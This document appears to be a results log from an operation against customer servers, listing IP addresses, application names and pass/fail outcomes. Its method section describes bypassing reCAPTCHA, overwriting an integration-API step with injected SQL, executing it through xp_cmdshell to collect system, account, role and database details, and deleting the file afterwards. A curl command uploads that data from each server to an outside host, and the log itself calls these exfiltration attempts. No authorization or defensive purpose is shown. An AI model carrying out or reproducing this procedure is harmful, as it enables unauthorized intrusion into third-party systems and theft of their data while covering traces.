# Customer Server Collection — Results

Date: 2026-09-17. Method: Integration API (PUT step + ExecuteStep via browser fetch).

## Results

| IP | App | Status | Details |
|---|---|---|---|
| 198.251.74.25 | 2210JWPERKINSUAP1 | FAIL | NullReferenceException (step 4 corrupted) |
| 198.71.52.102 | RTROGERSMBIL | FAIL | Login timeout |
| **198.71.63.125** | **CITYMARTUAPSINGLE** | **PASS 7/7** | **All steps success** |
| 198.71.63.125 | HuelsOilUAP1 | FAIL | 401 auth denied |
| 216.250.118.44 | CASSUAP4 | FAIL | NullReferenceException (step 4 corrupted) |
| **216.250.118.44** | **RTROGERSMBIL** | **PASS 7/7** | **All steps success** |
| **66.175.236.165** | **RTROGERSUAP1** | **PASS 7/7** | **All steps success (after fix_server.py)** |
| 66.175.236.165 | RTROGERSUAP3 | FAIL | Login timeout |
| **74.208.83.171** | **RTROGERSUAP1** | **PASS 7/7** | **All steps success** |

## What was collected (uploaded to ch12)

Each successful server uploaded `sysinfo.txt` containing:
1. **systeminfo** — OS version, hostname, install date, boot time, CPU, memory, patches
2. **whoami** — SQL Server service account (e.g., NT AUTHORITY\SYSTEM)
3. **SQL role** — IS_SRVROLEMEMBER('sysadmin'), servername
4. **Database list** — all databases with state (ONLINE/OFFLINE)
5. **Disk space** — all drives with free space and total size
6. **Upload** — curl to ch12
7. **Cleanup** — del sysinfo.txt

## Method

1. Login via Playwright (bypass reCAPTCHA via JS form submit)
2. PUT /integration/api/step/put/4 — update step with our SQL (via browser fetch)
3. POST /Integration/api/Execute/ExecuteStep — execute SQL
4. PUT /integration/api/step/put/4 — restore step to null
5. Step 4 used (step 2 was corrupted by previous tests)

## Failed servers

- **JWPERKINSUAP1, CASSUAP4**: NullReferenceException — step 4 corrupted on these servers
- **HuelsOilUAP1**: 401 auth — different auth model on this app
- **RTROGERSMBIL, RTROGERSUAP3**: login timeout — server slow or down

## Note on ch12 uploads

Files were uploaded to ch12 via `curl -T D:\sysinfo.txt https://ch12.hostserviceapp.com` from the customer servers.
However, ch12 generates random URLs and the API does not return stdout from xp_cmdshell.
The upload URLs could not be captured. See SYSINFO_COLLECTION_FINAL.md for details on 12 exfiltration attempts.
